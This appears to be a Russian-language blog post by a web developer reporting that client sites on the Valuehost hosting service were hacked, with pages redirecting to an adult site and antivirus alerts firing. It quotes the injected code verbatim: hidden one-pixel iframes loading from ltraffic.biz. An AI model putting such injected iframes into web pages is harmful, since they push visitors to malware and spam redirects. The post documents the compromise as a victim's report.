Замечать какие-то баги стала где-то с середины октября. А вчера...

Открыла для работы сайт клиента, что лежит на Валуехост. Опять как-то тормозно и подергиваясь подгрузился. Да что ж с ним, черт. Отвлеклась отхлебнуть чаю. Возвращаюсь к монитору... Опс! Меня благополучно перебрасывает на dosug.nu
Приплыли! Не может же быть! Опять что ли!?
Лезу в код. Внизу страницы прописано: 

<iframe src="http://ltraffic.biz/resource.php?id=158&user=xpass" width=1 height=1></iframe></body>
<iframe src="http://ltraffic.biz/resource.php?id=158&user=xpass" width=1 height=1></iframe></html>

Тэээкс... В страшном предчувствии открываю сайт второго клиента, что тоже на Валуехосте. Знакомые подергивания при загрузке. Ага... Мелькает знакомый IP в строке состояния. Лезу в код. Такая же ботва. Тьфу ты...
 
Открываю яндекс, набираю link="ltraffic.biz/*"

Беру на выбор сайты, убеждаюсь, что лежат на Валуехосте, смотрю внизу страницы код... Аналогичная картина.

arden.ru
lionlabs.com
dobermannclub.ru
eprussia.ru
fortification.ru

ну и так далее... Одно из двух. Либо они сами так охринели, либо их опять сломали.
Сдуру гуляю по сайтам через IE. Антивирус периодически повякивает.
В последствии диагностирует следующее:



Не, ну я могу еще стойко перенести, если в коде просто ссылки. Но редирект на порнуху или периодическая подкачка вируса - это уже определенно перебор.
И главное полное молчание от Валуя ... тишь да благодать. А кто из пользователей не заметил внедрений на своем сайте, так это его невнимательного пользователя проблемы. Пусть дальше помогает зарабатывать на порнотрафике и распространении вирусов. А так же неплохой риск попасть за редирект в бан у поисковиков...

UPD: Прошлась по этим сайтам с работы. После загрузки сайта антивирус NOD32 выдает следующее:



UPD2: Официальный ответ Valuehost:


Порадовала официальная новость: http://www.viruslist.com/ru/weblog?weblogid=207758614